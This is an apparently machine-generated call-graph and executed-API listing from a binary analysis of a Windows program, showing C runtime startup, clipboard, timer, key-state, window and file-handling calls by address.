DragFinish 118158->118124 118159 401c07 118159->118154 118167 401c4a KillTimer 118159->118167 118160 401a6f SendMessageA 118160->118124 118162 4019b8 GetKeyState 118164 4019d0 GetKeyState 118162->118164 118162->118168 118163 401a89 SendMessageA 118163->118124 118164->118168 118165 402268 GetTickCount 118165->118168 118166 402251 GetTickCount 118166->118168 118167->118154 118168->118124 118168->118131 118168->118134 118168->118135 118168->118137 118168->118138 118168->118140 118168->118141 118168->118144 118168->118149 118168->118151 118168->118152 118168->118153 118168->118155 118168->118156 118168->118157 118168->118158 118168->118159 118168->118160 118168->118162 118168->118163 118170 401635 _strncpy 118168->118170 118171 402122 GetTickCount 118168->118171 118172 4018e8 GetKeyState 118168->118172 118173 401a30 SendMessageA 118168->118173 118174 401a10 SendMessageA 118168->118174 118176 40190d GetWindowLongA 118168->118176 118179 401952 GetKeyState 118168->118179 118182 4764e0 GetWindowLongA GetParent GetWindowLongA 118168->118182 118183 45a160 GetWindowLongA GetParent 118168->118183 118185 4030c0 joyGetPosEx PostMessageA 118168->118185 118188 409680 95 API calls 118168->118188 118190 40a030 95 API calls 118168->118190 118170->118124 118170->118165 118170->118166 118170->118168 118170->118171 118180 466f60 107 API calls 118170->118180 118184 463460 PostMessageA 118170->118184 118186 402f00 25 API calls _strncpy 118170->118186 118187 463400 ShowWindow 118170->118187 118189 40c660 272 API calls 2 library calls 118170->118189 118191 401000 17 API calls 118170->118191 118192 4034e0 SetCurrentDirectoryA GetTickCount LoadImageA Shell_NotifyIcon 118170->118192 118202 40a3f0 144 API calls 118170->118202 118171->118124 118172->118168 118173->118124 118174->118124 118176->118168 118178 40233a GetTickCount 118178->118170 118179->118170 118180->118170 118182->118168 118183->118168 118184->118170 118185->118168 118186->118170 118187->118170 118188->118168 118189->118170 118190->118168 118191->118170 118192->118178 118193->118115 118194->118096 118195->118111 118196->118115 118197->118127 118198->118130 118199->118126 118200->118170 118201->118168 118202->118168 118203 487b7d 118234 489be0 118203->118234 118205 487b89 GetStartupInfoW 118206 487b9d HeapSetInformation 118205->118206 118208 487ba8 118205->118208 118206->118208 118235 489251 HeapCreate 118208->118235 118209 487bf6 118236 488b6b GetModuleHandleW 118209->118236 118211 487c07 __RTC_Initialize 118255 48aea1 GetStartupInfoW 118211->118255 118214 487c2c GetCommandLineA 118268 48db3a GetEnvironmentStringsW 118214->118268 118215 487c24 __amsg_exit 118215->118214 118220 487c4a __amsg_exit 118221 487c52 118220->118221 118294 48d809 118221->118294 118223 487c57 118224 487c5b __amsg_exit 118223->118224 118225 487c63 118223->118225 118224->118225 118313 484a99 118225->118313 118227 487c6a 118228 487c6f __amsg_exit 118227->118228 118229 487c76 118227->118229 118228->118229 118319 48d7aa 118229->118319 118233 487c97 118234->118205 118235->118209 118237 488b7f 118236->118237 118238 488b88 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 118236->118238 118362 4888b8 5 API calls __freebuf 118237->118362 118241 488bd2 TlsAlloc 118238->118241 118243 488c20 TlsSetValue 118241->118243 118244 488ce1 118241->118244 118242 488b84 118242->118211 118243->118244 118245 488c31 118243->118245 118244->118211 118363 4895ad InitializeCriticalSectionAndSpinCount 118245->118363 118247 488cdc 118365 4888b8 5 API calls __freebuf 118247->118365 118249 488c75 118249->118247 118250 48ac43 2 API calls 118249->118250 118251 488ca4 118250->118251 118251->118247 118252 488cc1 118251->118252 118364 4888f5 11 API calls 2 library calls 118252->118364 118254 488cc9 GetCurrentThreadId 118254->118244 118256 48ac43 2 API calls 118255->118256 118257 48aebf 118256->118257 118258 487c20 118257->118258 118259 48b034 118257->118259 118262 48ac43 2 API calls 118257->118262 118264 48afb4 118257->118264 118258->118214 118258->118215 118260 48b06a GetStdHandle 118259->118260 118261 48b0ce SetHandleCount 118259->118261 118263 48b07c GetFileType 118259->118263 118267 48b0a2 InitializeCriticalSectionAndSpinCount 118259->118267 118260->118259 118261->118258 118262->118257 118263->118259 118264->118259 118265 48afeb InitializeCriticalSectionAndSpinCount 118264->118265 118266 48afe0 GetFileType 118264->118266 118265->118258 118265->118264 118266->118264 118266->118265 118267->118258 118267->118259 118270 487c3c 118268->118270 118273 48db56 WideCharToMultiByte 118268->118273 118281 48da7f 118270->118281 118271 48dbc3 FreeEnvironmentStringsW 118271->118270 118272 48db8b 118366 48abfe 15 API calls __getbuf 118272->118366 118273->118271 118273->118272 118275 48db91 118275->118271 118276 48db99 WideCharToMultiByte 118275->118276 118277 48dbb7 FreeEnvironmentStringsW 118276->118277 118278 48dbab 118276->118278 118277->118270 118367 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 118278->118367 118280 48dbb3 118280->118277 118282 48da94 118281->118282 118283 48da99 GetModuleFileNameA 118281->118283 118374 48851b 48 API calls 118282->118374 118284 48dac0 118283->118284 118368 48d8e5 118284->118368 118287 487c46 118287->118220 118287->118221 118289 48dafc 118375 48abfe 15 API calls __getbuf 118289->118375 118291 48db02 118291->118287 118292 48d8e5 _parse_cmdline 24 API calls 118291->118292 118293 48db1c 118292->118293 118293->118287 118295 48d812 118294->118295 118298 48d817 _strlen 118294->118298 118377 48851b 48 API calls 118295->118377 118296 48d825 118296->118223 118298->118296 118299 48ac43 2 API calls 118298->118299 118301 48d84c _strlen 118299->118301 118300 48d89b 118378 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 118300->118378 118301->118296 118301->118300 118303 48ac43 2 API calls 118301->118303 118304 48d8c1 118301->118304 118306 48d8d8 118301->118306 118303->118301 118379 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 118304->118379 118380 489164 118306->118380 118308 48d8e4 118311 48d971 118308->118311 118383 48d5cd 24 API calls x_ismbbtype_l 118308->118383 118310 48da6f 118310->118223 118311->118310 118312 48d5cd 24 API calls _parse_cmdline 118311->118312 118312->118311 118314 484aa7 118313->118314 118315 484ac5 __initterm_e 118314->118315 118316 484ada 118315->118316 118317 484ae6 118315->118317 118384 48535d 22 API calls 118316->118384 118317->118227 118320 48d7b8 118319->118320 118324 48d7bd 118319->118324 118385 48851b 48 API calls 118320->118385 118322 487c7b 118325 403af0 RtlInitializeCriticalSection SetErrorMode GetCurrentDirectoryA 118322->118325 118324->118322 118386 48d5cd 24 API calls x_ismbbtype_l 118324->118386 118326 403bf6 118325->118326 118332 403b2f 118325->118332 118326->118332 118478 46ee70 22 API calls 118326->118478 118327 403ce4 118334 403d26 118327->118334 118479 420db0 44 API calls 2 library calls 118327->118479 118331 403d35 118331->118233 118332->118327 118332->118331 118476 484cd8 60 API calls 3 library calls 118332->118476 118477 420db0 44 API calls 2 library calls 118332->118477 118334->118331 118387 414f80 GetModuleFileNameA 118334->118387 118338 403eab 118340 403eb3 FindWindowA 118338->118340 118341 403f31 SystemParametersInfoA 118338->118341 118339 403e40 118339->118341 118342 403e4c FindWindowA 118339->118342 118340->118341 118345 403ea4 PostMessageA Sleep IsWindow 118340->118345 118343 403f61 118341->118343 118344 403f4b 118341->118344 118342->118341 118353 403e68 118342->118353 118434 415240 118343->118434 118344->118343 118347 403f54 SystemParametersInfoA 118344->118347 118350 403f2d Sleep 118345->118350 118354 403ef2 118345->118354 118346 403dde 118346->118331 118346->118338 118346->118339 118346->118340 118347->118343 118350->118341 118351 403f6b _vswprintf_s 118351->118331 118458 484d71 62 API calls 6 library calls 118351->118458 118352 403f1d Sleep IsWindow 118352->118350 118352->118354 118353->118331 118353->118345 118354->118331 118354->118352 118356 403f88 118357 484959 __getbuf 14 API calls 118356->118357 118358 403f9e setSBCS 118356->118358 118357->118358 118359 404028 118358->118359 118480 420db0 44 API calls 2 library calls 118358->118480 118459 415820 118359->118459 118362->118242 118363->118249 118364->118254 118365->118244 118366->118275 118367->118280 118370 48d904 118368->118370 118372 48d971 118370->118372 118376 48d5cd 24 API calls x_ismbbtype_l 118370->118376 118371 48da6f 118371->118287 118371->118289 118372->118371 118373 48d5cd 24 API calls _parse_cmdline 118372->118373 118373->118372 118374->118283 118375->118291 118376->118370 118377->118298 118378->118296 118379->118296 118381 48903b 118380->118381 118382 489176 GetCurrentProcess TerminateProcess 118381->118382 118382->118308 118383->118308 118384->118317 118385->118324 118386->118324 118481 472770 118387->118481 118390 414fd8 118391 403db9 118390->118391 118502 48699a 26 API calls 118390->118502 118391->118331 118408 415e50 118391->118408 118394 415037 118395 415068 118394->118395 118503 46ee70 22 API calls 118394->118503 118395->118391 118398 4150d3 118395->118398 118504 46ee70 22 API calls 118395->118504 118398->118391 118403 41515a 118398->118403 118505 46ee70 22 API calls 118398->118505 118399 4151a2 GetModuleFileNameA 118399->118391 118401 4151be 118399->118401 118506 46ee00 22 API calls 118401->118506 118403->118391 118403->118399 118404 4151e2 118404->118391 118507 48699a 26 API calls 118404->118507 118406 4151fa 118508 46ee00 22 API calls 118406->118508 118409 41605e 118408->118409 118410 415e79 118408->118410 118409->118346 118410->118409 118411 415e8e 118410->118411 118512 46eee0 118410->118512 118413 46eee0 22 API calls 118411->118413 118414 415ea8 118411->118414 118413->118414 118414->118409 118517 4161b0 111 API calls 5 library calls 118414->118517 118416 415f0c 118416->118409 118518 41bf10 44 API calls 2 library calls 118416->118518 118418 415f20 118418->118409 118519 421490 60 API calls 118418->118519 118420 415f30 118420->118409 118421 415fb7 SetCurrentDirectoryA 118420->118421 118520 41f000 27 API calls 118420->118520 118521 41bf10 44 API calls 2 library calls 118421->118521 118424 415fd4 118424->118409 118522 41bf10 44 API calls 2 library calls 118424->118522 118426 415f9b 118426->118409 118426->118421 118427 415fe7 118427->118409 118523 4218d0 53 API calls 118427->118523 118429 416011 118429->118409 118524 420ac0 44 API calls 118429->118524 118431 416024 118431->118409 118432 41603d GetSystemTimeAsFileTime 118431->118432 118433 416051 118432->118433 118433->118346 118435 41525b setSBCS 118434->118435 118440 41530c 118434->118440 118436 4152a4 GetSystemMetrics 118435->118436 118435->118440 118437 4736a0 118436->118437 118438 4152c3 LoadCursorA RegisterClassExA 118437->118438 118439 415335 RegisterClassExA 118438->118439 118438->118440 118439->118440 118441 415351 GetForegroundWindow 118439->118441 118440->118351 118442 41535b GetClassNameA 118441->118442 118443 41536d 118441->118443 118442->118443 118444 41538f CreateWindowExA 118443->118444 118445 4153e1 118444->118445 118446 41540a GetMenu EnableMenuItem 118444->118446 118445->118351 118447 415640 118446->118447 118448 41542b CreateWindowExA 118447->118448 118448->118445 118449 41545e GetDC 118448->118449 118450 415470 8 API calls 118449->118450 118452 415511 ShowWindow SetWindowLongA 118450->118452 118453 41552c LoadAcceleratorsA 118450->118453 118452->118453 118454 415553 118453->118454 118455 415574 118454->118455 118456 41556d 118454->118456 118455->118351 118525 415590 PostMessageA SetClipboardViewer ChangeClipboardChain 118456->118525 118458->118356 118460 484959 __getbuf 14 API calls 118459->118460 118461 41583c 118460->118461 118462 41584a 118461->118462 118463 415853 SetTimer 118461->118463 118462->118331 118464 415894 GetTickCount 118463->118464 118465 415887 118463->118465 118466 4158c6 SetTimer 118464->118466 118467 4158e2 GetTickCount 118464->118467 118474 41595e 118465->118474 118527 42d970 57 API calls 2 library calls 118465->118527 118466->118467 118526 423f40 131 API calls __alldiv 118467->118526 118469 41590d 118471 415932 118469->118471 118472 41591f KillTimer 118469->118472 118471->118465 118472->118471 118473 415a49 118473->118331 118474->118473 118475 415a90 140 API calls 118474->118475 118475->118473 118476->118332 118477->118332 118478->118332 118479->118334 118480->118359 118482 472786 118481->118482 118498 414fb9 118481->118498 118483 4727b8 118482->118483 118482->118498 118509 409310 25 API calls 118482->118509 118484 485791 26 API calls 118483->118484 118486 4727c2 __Stoull 118484->118486 118487 4727cb _strncpy 118486->118487 118488 485791 26 API calls 118486->118488 118486->118498 118489 485791 26 API calls 118487->118489 118490 4727f3 118488->118490 118499 47282c 118489->118499 118490->118487 118492 485791 26 API calls 118490->118492 118491 47288e FindFirstFileA 118493 47289e FindClose 118491->118493 118491->118498 118492->118487 118511 4719e0 60 API calls _vswprintf_s 118493->118511 118494 472840 FindFirstFileA 118496 47285a FindClose 118494->118496 118494->118498 118510 4719e0 60 API calls _vswprintf_s 118496->118510 118498->118390 118501 46ee70 22 API calls 118498->118501 118499->118491 118499->118494 118500 485791 26 API calls 118499->118500 118500->118499 118501->118390 118502->118394 118503->118395 118504->118398 118505->118403 118506->118404 118507->118406 118508->118391 118509->118483 118510->118499 118511->118498 118513 486a00 22 API calls 118512->118513 118514 46eee8 118513->118514 118515 46ef02 118514->118515 118516 484959 __getbuf 14 API calls 118514->118516 118515->118411 118516->118515 118517->118416 118518->118418 118519->118420 118520->118426 118521->118424 118522->118427 118523->118429 118524->118431 118525->118455 118526->118469 118527->118474 118528 42609f 118557 450930 LoadLibraryA 118528->118557 118530 423fd4 GetTickCount 118533 423ff2 PeekMessageA 118530->118533 118552 423fa0 __alldiv 118530->118552 118531 423fb0 GlobalUnWire 118532 423fc2 CloseClipboard 118531->118532 118532->118530 118534 424018 GetTickCount 118533->118534 118535 42400c 118533->118535 118534->118552 118536 424015 118535->118536 118536->118534 118537 4240c7 GetTickCount 118544 4240f2 118537->118544 118537->118552 118540 42455d 118541 423f40 131 API calls 118541->118544 118542 485791 26 API calls 118542->118552 118543 471830 25 API calls 118543->118552 118544->118541 118544->118552 118546 412c30 42 API calls 118546->118552 118548 412b30 32 API calls 118548->118552 118549 412b00 27 API calls 118549->118552 118551 409310 25 API calls 118551->118552 118552->118530 118552->118531 118552->118532 118552->118537 118552->118540 118552->118542 118552->118543 118552->118544 118552->118546 118552->118548 118552->118549 118552->118551 118553 424f8a GetSystemTimeAsFileTime FileTimeToLocalFileTime 118552->118553 118554 401000 17 API calls 118552->118554 118599 401210 131 API calls 118552->118599 118600 43aca0 91 API calls 118552->118600 118601 4740e0 32 API calls 118552->118601 118602 473e50 18 API calls 118552->118602 118603 471410 29 API calls 118552->118603 118604 4716a0 62 API calls 118552->118604 118605 471750 34 API calls __alldiv 118552->118605 118553->118552 118554->118552 118558 450980 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 118557->118558 118559 45094b 118557->118559 118560 450cc1 FreeLibrary 118558->118560 118564 4509d1 118558->118564 118562 45095d 118559->118562 118634 42d230 22 API calls __freebuf 118559->118634 118560->118559 118563 450cd7 118560->118563 118562->118552 118563->118552 118564->118560 118566 4509f4 118564->118566 118565 450d12 118565->118552 118571 450a1b 118566->118571 118620 412b00 27 API calls 118566->118620 118568 450a7a 118581 450a91 FreeLibrary 118568->118581 118606 487231 118568->118606 118569 450a59 FreeLibrary 118621 42fa00 22 API calls 118569->118621 118571->118568 118571->118569 118572 450a6d 118572->118552 118577 450ae2 118580 450bd3 118577->118580 118582 450b32 118577->118582 118578 450aaa 118578->118552 118579 450c6e FreeLibrary 118609 487486 118579->118609 118580->118579 118584 450bf7 GetTickCount 118580->118584 118622 42fa00 22 API calls 118581->118622 118582->118579 118583 450b59 GetTickCount 118582->118583 118586 450b75 PeekMessageA 118583->118586 118593 450b8c 118583->118593 118585 450c13 PeekMessageA 118584->118585 118590 450c2a 118584->118590 118589 450c36 GetTickCount 118585->118589 118585->118590 118588 450b98 GetTickCount 118586->118588 118586->118593 118588->118593 118589->118590 118590->118579 118590->118580 118590->118589 118592 48739f 62 API calls 118590->118592 118592->118590 118593->118582 118593->118588 118597 450bce 118593->118597 118623 48739f 118593->118623 118595 450c89 118596 450c90 DeleteFileA 118595->118596 118598 450ca0 118595->118598 118596->118598 118597->118579 118598->118552 118599->118552 118600->118552 118601->118552 118602->118552 118603->118552 118604->118552 118605->118552 118635 487175 118606->118635 118608 450ac9 118608->118577 118608->118581 118610 487492 __tsopen_nolock 118609->118610 118611 4874b9 118610->118611 118612 4874a4 __chsize_nolock 118610->118612 118619 4874b4 118611->118619 118881 484f3e 118611->118881 118899 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118612->118899 118614 4874d2 118885 487419 118614->118885 118619->118595 118620->118571 118621->118572 118622->118578 118624 4873ab __tsopen_nolock 118623->118624 118625 4873db 118624->118625 118626 4873c3 __chsize_nolock 118624->118626 118627 4873d3 118624->118627 118628 484f3e RtlEnterCriticalSection 118625->118628 118917 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118626->118917 118627->118593 118629 4873e3 118628->118629 118918 487248 118629->118918 118634->118565 118636 487181 __tsopen_nolock 118635->118636 118637 4871c1 118636->118637 118638 487194 __chsize_nolock 118636->118638 118646 48c631 118637->118646 118676 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118638->118676 118641 4871c6 118642 4871a4 @_EH4_CallFilterFunc@8 __chsize_nolock 118641->118642 118662 48c39a 118641->118662 118642->118608 118647 48c63d __tsopen_nolock 118646->118647 118648 48c6c7 118647->118648 118660 48c6c0 118647->118660 118681 489665 19 API calls 4 library calls 118647->118681 118682 484f7f RtlEnterCriticalSection 118647->118682 118683 484fed RtlLeaveCriticalSection RtlLeaveCriticalSection __tsopen_nolock 118647->118683 118684 48abfe 15 API calls __getbuf 118648->118684 118651 48c6ce 118652 48c6dc InitializeCriticalSectionAndSpinCount 118651->118652 118651->118660 118654 48c6fc 118652->118654 118655 48c70f RtlEnterCriticalSection 118652->118655 118685 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 118654->118685 118655->118660 118657 48c750 118657->118641 118659 48c704 118659->118660 118678 48c75b 118660->118678 118663 48c3bc 118662->118663 118664 48c3e7 __Stoull 118663->118664 118665 48c3d0 __chsize_nolock 118663->118665 118670 48c5d8 __chsize_nolock 118664->118670 118672 48c570 __Stoull 118664->118672 118674 48c584 118664->118674 118690 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118665->118690 118667 48c5ea 118687 490c99 118667->118687 118669 48720c 118677 487227 RtlLeaveCriticalSection RtlLeaveCriticalSection 118669->118677 118691 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118670->118691 118673 48c58f __Stoull 118672->118673 118672->118674 118673->118674 118675 48c5ae __Stoull 118673->118675 118674->118667 118674->118670 118675->118670 118675->118674 118676->118642 118677->118642 118686 48964e RtlLeaveCriticalSection 118678->118686 118680 48c762 118680->118657 118681->118647 118682->118647 118683->118647 118684->118651 118685->118659 118686->118680 118692 490bd5 118687->118692 118689 490cb4 118689->118669 118690->118669 118691->118669 118695 490be1 __tsopen_nolock 118692->118695 118693 490bf4 __chsize_nolock 118777 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118693->118777 118694 490c2a 118701 4904a1 118694->118701 118695->118693 118695->118694 118698 490c44 118778 490c6b RtlLeaveCriticalSection __unlock_fhandle 118698->118778 118700 490c03 118700->118689 118707 4904c8 118701->118707 118702 49074d __tsopen_nolock __chsize_nolock 118703 489164 __fltout2 2 API calls 118702->118703 118704 490bd4 __tsopen_nolock 118703->118704 118706 490bf4 __chsize_nolock 118704->118706 118709 490c2a 118704->118709 118705 490523 __chsize_nolock 118779 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118705->118779 118808 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118706->118808 118707->118702 118707->118705 118708 49057e 118707->118708 118715 490605 __chsize_nolock 118708->118715 118719 4905d8 118708->118719 118712 4904a1 __tsopen_nolock 80 API calls 118709->118712 118713 490c44 118712->118713 118809 490c6b RtlLeaveCriticalSection __unlock_fhandle 118713->118809 118780 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118715->118780 118716 490c03 118716->118698 118718 49053c __chsize_nolock 118718->118698 118719->118718 118720 4906c0 CreateFileA 118719->118720 118721 49075d GetFileType 118720->118721 118722 4906ed 118720->118722 118723 49076a GetLastError 118721->118723 118724 4907ae 118721->118724 118725 490726 GetLastError 118722->118725 118727 490701 CreateFileA 118722->118727 118781 48922e __tsopen_nolock __chsize_nolock 118723->118781 118782 490f9b SetStdHandle __chsize_nolock 118724->118782 118725->118702 118727->118721 118727->118725 118728 490793 CloseHandle 118728->118702 118730 4907cc 118731 490ac0 118730->118731 118732 490822 118730->118732 118736 490891 118730->118736 118731->118702 118735 490b4a CloseHandle CreateFileA 118731->118735 118783 49221b SetFilePointer GetLastError __tsopen_nolock __chsize_nolock 118732->118783 118734 49082c 118751 490835 __chsize_nolock 118734->118751 118785 491c64 27 API calls 5 library calls 118734->118785 118737 490b77 GetLastError 118735->118737 118773 490a50 __chsize_nolock 118735->118773 118736->118731 118741 4909eb 118736->118741 118752 49093b 118736->118752 118738 490b83 __tsopen_nolock 118737->118738 118807 49101c SetStdHandle __chsize_nolock 118738->118807 118740 49085f 118744 490878 118740->118744 118786 491aae 55 API calls 2 library calls 118740->118786 118741->118731 118750 490a08 118741->118750 118755 49095f 118741->118755 118743 4909a6 118745 490842 118743->118745 118790 491c64 27 API calls 5 library calls 118743->118790 118744->118745 118787 49221b SetFilePointer GetLastError __tsopen_nolock __chsize_nolock 118744->118787 118784 48d401 CloseHandle GetLastError SetStdHandle __tsopen_nolock 118745->118784 118791 48e62d SetFilePointer GetLastError __tsopen_nolock __chsize_nolock 118750->118791 118751->118736 118751->118745 118752->118731 118752->118743 118752->118755 118757 49098a 118752->118757 118754 4909c0 118754->118745 118761 490a63 118754->118761 118762 490a49 118754->118762 118763 490a85 118754->118763 118768 4909e2 118754->118768 118755->118731 118755->118745 118796 48cfbf 118755->118796 118756 490a13 118756->118755 118759 490a1e 118756->118759 118788 48e62d SetFilePointer GetLastError __tsopen_nolock __chsize_nolock 118757->118788 118792 48e62d SetFilePointer GetLastError __tsopen_nolock __chsize_nolock 118759->118792 118761->118763 118769 490a6a 118761->118769 118793 48d401 CloseHandle GetLastError SetStdHandle __tsopen_nolock 118762->118793 118795 49221b SetFilePointer GetLastError __tsopen_nolock __chsize_nolock 118763->118795 118764 490995 118764->118755 118770 49099c 118764->118770 118768->118731 118794 49221b SetFilePointer GetLastError __tsopen_nolock __chsize_nolock 118769->118794 118789 48e62d SetFilePointer GetLastError __tsopen_nolock __chsize_nolock 118770->118789 118771 490a28 118771->118731 118771->118745 118773->118702 118776 490a74 118776->118745 118776->118768 118777->118700 118778->118700 118779->118718 118780->118718 118781->118728 118782->118730 118783->118734 118784->118702 118785->118740 118786->118744 118787->118751 118788->118764 118789->118743 118790->118754 118791->118756 118792->118771 118793->118773 118794->118776 118795->118771 118797 48cfcb __tsopen_nolock 118796->118797 118798 48d034 118797->118798 118800 48cffa __chsize_nolock 118797->118800 118805 48cfd3 __chsize_nolock 118797->118805 118810 49110b 118798->118810 118865 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118800->118865 118801 48d03a 118802 48d054 __chsize_nolock 118801->118802 118818 48c8c2 118801->118818 118866 48d08b RtlLeaveCriticalSection __unlock_fhandle 118802->118866 118805->118755 118807->118773 118808->118716 118809->118716 118814 491117 __tsopen_nolock 118810->118814 118811 491171 118812 491176 RtlEnterCriticalSection 118811->118812 118813 491193 118811->118813 118812->118813 118813->118801 118814->118811 118815 49114c InitializeCriticalSectionAndSpinCount 118814->118815 118816 49115f 118814->118816 118815->118816 118867 4911a1 RtlLeaveCriticalSection __tsopen_nolock 118816->118867 118819 48c8d1 __chsize_nolock 118818->118819 118821 48c926 118819->118821 118829 48c907 __chsize_nolock 118819->118829 118850 48c8fc __tsopen_nolock __chsize_nolock 118819->118850 118823 48c982 118821->118823 118824 48c965 __chsize_nolock 118821->118824 118822 48cfbd 118822->118802 118825 48c989 118823->118825 118826 48c998 118823->118826 118874 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118824->118874 118875 48e62d SetFilePointer GetLastError __tsopen_nolock __chsize_nolock 118825->118875 118868 48e7e5 118826->118868 118873 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118829->118873 118830 48c995 118830->118826 118832 48c99e 118834 48cc40 118832->118834 118876 488a22 __amsg_exit 118832->118876 118835 48cc4f 118834->118835 118836 48cef0 WriteFile 118834->118836 118841 48cc62 118835->118841 118842 48cd0a 118835->118842 118839 48cf23 GetLastError 118836->118839 118840 48cf0e 118836->118840 118838 48c9b9 GetConsoleMode 118838->118834 118845 48c9e2 118838->118845 118839->118840 118840->118850 118841->118840 118847 48ccac WriteFile 118841->118847 118843 48cd17 118842->118843 118844 48cde4 118842->118844 118843->118840 118848 48cd86 WriteFile 118843->118848 118844->118840 118849 48ce55 WideCharToMultiByte 118844->118849 118845->118834 118846 48c9f2 GetConsoleCP 118845->118846 118846->118840 118855 48ca15 118846->118855 118847->118839 118852 48cce0 118847->118852 118848->118839 118856 48cdba 118848->118856 118849->118839 118851 48ce8c WriteFile 118849->118851 118850->118840 118880 48b884 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 118850->118880 118853 48ceb7 118851->118853 118854 48cec3 GetLastError 118851->118854 118852->118840 118852->118841 118852->118850 118853->118840 118853->118844 118853->118850 118853->118851 118854->118853 118855->118840 118855->118850 118859 48ca82 118855->118859 118861 48cac1 WideCharToMultiByte 118855->118861 118877 48b715 24 API calls __isleadbyte_l 118855->118877 118879 490f4f 26 API calls __Stoull 118855->118879 118856->118840 118856->118843 118856->118850 118859->118839 118859->118840 118859->118855 118860 490df7 WriteConsoleW CreateFileW __chsize_nolock 118859->118860 118859->118861 118864 48cb46 WriteFile 118859->118864 118878 490f4f 26 API calls __Stoull 118859->118878 118860->118859 118861->118840 118862 48caf2 WriteFile 118861->118862 118862->118839 118862->118859 118864->118839 118864->118859 118865->118805 118866->118805 118867->118811 118870 48e801 __chsize_nolock 118868->118870 118872 48e7f2 __chsize_nolock 118868->118872 118869 48e81f 118869->118832 118870->118869 118871 4891b6 __mbsnbicmp_l GetCurrentProcess TerminateProcess 118870->118871 118871->118872 118872->118832 118873->118850 118874->118850 118875->118830 118876->118838 118877->118855 118878->118859 118879->118855 118880->118822 118882 484f50 118881->118882 118883 484f72 RtlEnterCriticalSection 118881->118883 118882->118883 118884 484f58 118882->118884 118883->118884 118884->118614 118886 48742a __chsize_nolock 118885->118886 118887 48743e 118885->118887 118907 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118886->118907 118888 48743a 118887->118888 118901 48ad0e 118887->118901 118900 4874f2 RtlLeaveCriticalSection RtlLeaveCriticalSection 118888->118900 118893 487452 118909 48c2a4 118893->118909 118895 487458 118914 48d49d 9 API calls 3 library calls 118895->118914 118897 48745e 118897->118888 118915 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 118897->118915 118899->118619 118900->118619 118902 48ad27 118901->118902 118906 48744a 118901->118906 118903 48c2a4 __ftbuf 2 API calls 118902->118903 118902->118906 118904 48ad42 118903->118904 118905 48cfbf __tsopen_nolock 52 API calls 118904->118905 118905->118906 118908 48acdd HeapFree GetLastError __freebuf 118906->118908 118907->118888 118908->118893 118910 48c2c5 118909->118910 118911 48c2b0 __chsize_nolock 118909->118911 118910->118895 118916 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118911->118916 118913 48c2c0 118913->118895 118914->118897 118915->118888 118916->118913 118917->118627 118919 487277 118918->118919 118920 48725a 118918->118920 118928 48740f RtlLeaveCriticalSection RtlLeaveCriticalSection 118919->118928 118920->118919 118921 487267 __chsize_nolock 118920->118921 118922 487291 118920->118922 118929 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 118921->118929 118922->118919 118925 48ad0e __ftbuf 52 API calls 118922->118925 118926 48c2a4 __ftbuf 2 API calls 118922->118926 118927 48cfbf __tsopen_nolock 52 API calls 118922->118927 118930 489dcf 118922->118930 118925->118922 118926->118922 118927->118922 118928->118627 118929->118919 118931 48c2a4 __ftbuf 2 API calls 118930->118931 118933 489ddf _vswprintf_s 118931->118933 118932 489dea __chsize_nolock 118932->118922 118933->118932 118934 489e73 118933->118934 118939 48e7e5 __chsize_nolock 2 API calls 118933->118939 118940 489e68 118933->118940 118935 489f02 118934->118935 118936 489e82 118934->118936 118937 48cfbf __tsopen_nolock 52 API calls 118935->118937 118936->118932 118938 48cfbf __tsopen_nolock 52 API calls 118936->118938 118937->118932 118938->118932 118939->118940 118940->118934 118942 48e79c 15 API calls __getbuf 118940->118942 118942->118934

    Executed Functions

    APIs
    • GlobalUnWire.KERNEL32(00000000), ref: 00401395
    • CloseClipboard.USER32 ref: 004013A1
      • Part of subcall function 004030C0: joyGetPosEx.WINMM ref: 004030EF
      • Part of subcall function 00402F00: GetTickCount.KERNEL32(?,0000000A), ref: 00402F83
      • Part of subcall function 00402F00: _strncpy.LIBCMT ref: 00402FF3
    • SetTimer.USER32(000601DA,00000009,0000000A), ref: 0040144A
    • GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040146F
      • Part of subcall function 00403690: GetTickCount.KERNEL32(0040171F), ref: 004036C2
    • GetMessageA.USER32(?,00000000,00000000,-00000311), ref: 004014B6
    • GetTickCount.KERNEL32 ref: 004014C1
    • GetFocus.USER32 ref: 0040155B
      • Part of subcall function 004764E0: GetWindowLongA.USER32(?,000000F0), ref: 004764F4
      • Part of subcall function 004764E0: GetParent.USER32(?), ref: 00476504
      • Part of subcall function 004764E0: GetWindowLongA.USER32(00000000,000000F0), ref: 0047650F
    • ShowWindow.USER32(000601DA,00000000), ref: 00401B84
      • Part of subcall function 0045A160: GetWindowLongA.USER32(00000000,000000F0), ref: 0045A1A0
      • Part of subcall function 0045A160: GetParent.USER32(00000000), ref: 0045A1AA
    • TranslateAccelerator.USER32(00000000,?,?), ref: 004015A1
    • GetKeyState.USER32(00000011), ref: 004018EA
    • GetWindowLongA.USER32(?,000000F0), ref: 00401912
    • GetKeyState.USER32(00000010), ref: 00401954
      • Part of subcall function 00466F60: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00466F7A
